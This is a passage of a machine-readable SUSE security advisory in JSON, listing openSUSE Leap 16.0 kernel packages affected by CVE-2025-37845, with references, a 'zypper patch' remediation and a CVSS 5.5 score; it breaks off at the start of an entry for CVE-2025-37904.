"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37845",
"url": "https://www.suse.com/security/cve/CVE-2025-37845"
},
{
"category": "external",
"summary": "SUSE Bug 1242986 for CVE-2025-37845",
"url": "https://bugzilla.suse.com/1242986"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-37845"
},
{
"cve": "CVE-2025-37904",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37904"
}
],
"notes": [
{
"category": "general",
